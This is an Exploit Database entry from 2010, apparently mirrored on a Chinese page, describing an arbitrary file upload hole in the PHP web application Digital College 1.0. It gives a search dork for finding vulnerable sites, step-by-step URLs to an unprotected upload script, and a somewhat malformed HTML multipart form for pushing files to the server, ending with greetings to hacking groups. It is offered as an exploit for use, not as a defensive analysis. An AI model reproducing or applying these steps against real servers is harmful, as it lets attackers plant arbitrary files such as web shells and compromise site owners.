Digital College 1.0 – Arbitrary File Upload

• Exploit Database
• 14 阅读

• 作者： indoushka
  日期： 2010-05-11
• 类别：

  • webapps
  平台：

  • php
• 来源：https://www.exploit-db.com/exploits/12568/

• ========================================================================================
  | # Title: Digital College 1.0 upload Vulnerability 
  | # Author : indoushka 
  | # email: indoushka@hotmail.com
  | # Dork : Powered by Digital College 1.0 - Magtrb Soft 2010 
  | # Tested on: windows SP2 Français V.(Pnx2 2.0)
  | # Bug: Upload
  | # Download : http://www.magtrb.com/ 
  ======================Exploit By indoushka =================================
  # Exploit:
  
  1 - Go To http://127.0.0.1/upload/includes/js/files/
  
  2 - use the Simple example
  
  you need to Creat a simple file uploader whith html lang and upload it to the sever
  ==================================================
  <html>
  <head><title>File Upload Tester</title></head>
  <body>
  
  <formenctype="multipart/form-data" action="test.html" method="post">	
  <tr>
  <tdvalign="top" align="center">
  	<table border=0 align="center" cellpadding=3>
  	<tr><td><input type="file" name="userfile[0]"></td></tr>
  	<tr><td><input type="file" name="userfile[1]"></td></tr>
  	<tr><td><input type="file" name="userfile[2]"></td></tr>
  	<tr><td colspan=2 align="center">
  		<input type="hidden" name="sessionid" value="<?= $sid ?>">
  		<input type="submit">
  	</td></tr></table>
  </td>
  </tr>
  <tr><td>
  <palign="center">Please visit <a href="https://www.exploit-db.com/exploits/12568/">http://www.iqs3cur1ty.com</a> by indoushka. 
  </p>
  
  
  </table>
  
  
  </form>
  
  </body>
  </html>
  ==============================================================
  
  3 - http://127.0.0.1/upload/includes/js/files/upload.php (2 Upload)
  
  http://127.0.0.1/upload\includes\js\files\files\uploader.html(2 Find It)
  
  Dz-Ghost Team ===== Saoucha * Star08 * Redda * theblind74 * XproratiX * onurozkan * n2n * Meher Assel ====================
  Greetz : Exploit-db Team : (loneferret+Exploits+dookie2000ca)
  all my friend :
  His0k4 * Hussin-X * Rafik (www.Tinjah.com) * Yashar (www.sc0rpion.ir) SoldierOfAllah (www.m4r0c-s3curity.cc)
  Stake (www.v4-team.com) * r1z (www.sec-r1z.com) * D4NB4R * www.alkrsan.net * MR.SoOoFe * ThE g0bL!N
  ------------------------------------------------------------------------------------------------------------------------